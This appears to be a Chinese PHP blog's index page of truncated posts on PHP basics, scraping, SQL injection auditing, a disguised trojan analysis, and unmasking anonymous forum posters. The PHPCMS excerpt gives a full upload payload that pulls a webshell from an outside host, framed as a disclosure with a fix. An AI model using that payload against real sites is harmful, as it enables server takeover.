PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结

PHP中的抽象类与抽象方法/静态属性和静态方法/PHP中的单利模式(单态模式)/串行化与反串行化(序列化与反序列化)/约束类型/魔术方法小结
PHP中的抽象类与抽象方法 1、什么是抽象方法? 没有方法体 {} 的方法,必须使用abstract 关键字修饰。这样的方,我们叫做抽象方法。 abstract function say(); // 抽象方法 2、什么是抽象类? 包含抽象方法的类就叫抽象类。抽象类必须使用abstract关键字修饰。 abstract class Person{} 3、抽象类的注意事项 ① 抽象类可以包...

PHPCMS最新版任意文件上传漏洞 及 修复方法

PHPCMS最新版任意文件上传漏洞 及 修复方法
注意这个漏洞不知道是哪位朋友爆出来的,找不到来路。。我只是给了修复建议。 首先打开注册页面,然后向注册页面POST如下payload: siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://xss.com/webshell//php_assert.php#.jpg>&dosubmit=1&protocol= 然后就会报错并返回shell地址...

【PHP代码审计】 初级入门SQL注入过程

【PHP代码审计】 初级入门SQL注入过程
很多同学不明白SQL注入过程,这里讲解的非常详细,所以就转载过来了。 0x02 环境搭建 PHP+MySql的集成环境特别多,像PhpStudy、Wamp和Lamp等下一步下一步点下去就成功安装了,网上搜索一下很多就不赘述。 这里提的环境是SQLol,它是一个可配置的SQL注入测试平台,包含了简单的SQL注入测试环境,即SQL语句的四元素增(Insert)、删(Delete)、改(Update)和查(Select)。 ...

一个伪装Discuz配置文件的php木马分析

一个伪装Discuz配置文件的php木马分析
问题出于土司论坛(地址):https://www.t00ls.net/thread-36298-1-1.html 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96...

php curl_getinfo的巧用

php curl_getinfo的巧用
最近使用curl的时候,发现了一个比较好用的函数,当然是初级者适用的一个函数,就是curl_getinfo(), 在抓取一个页面的时候,会遇到302页面跳转的情况,刚开始处理的时候,是用curl抓取一个域名页面的内容,适用curl_exec,抓取页面全部内容,然后用正则匹配出来用户域名url,通过此域名再次抓取此地址的内容,这样做挺麻烦的,后来发现curl_getinfo(),返回来一个数组类型的...

密码保护:php post get 模拟登陆OR采集数据代码

密码保护:php post get 模拟登陆OR采集数据代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 11...

利用QueryList多线程插件批量下载太平洋电脑网壁纸,涉及到采集gzip页面,很容易被当作乱码

利用QueryList多线程插件批量下载太平洋电脑网壁纸,涉及到采集gzip页面,很容易被当作乱码
PHP采集,演示QueryList3.0多线程插件使用技巧,多线程批量采集页面同时批量下载图片;以及采集gzip页面,gzip页面很容易被误以为是乱码,实际上是经过压缩过的页面,解压后即可看到原网页内容。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 <?php require '/QueryList/QueryList.class.php'; $urls = array(...

看我如何揪出【t00ls】论坛中匿名回帖的人!

看我如何揪出【t00ls】论坛中匿名回帖的人!
【主题前奏】 不喜欢前奏的请直接拉下去看正文!【图片没挂,需要你购买帖子后能看到图片】 有时候挺郁闷的,等级太低,明明有个人发布了【Freebuf模拟登陆】,本来想看看,还没等打开,管理员分分钟就阅读权限20...让我们情何以堪!!!! 很多论坛都有匿名发帖回帖,其实我个人觉得匿名发帖这个功能如果想指着它逃避WJ的追查,好像就是有点掩耳盗铃的说,我是这么觉得,...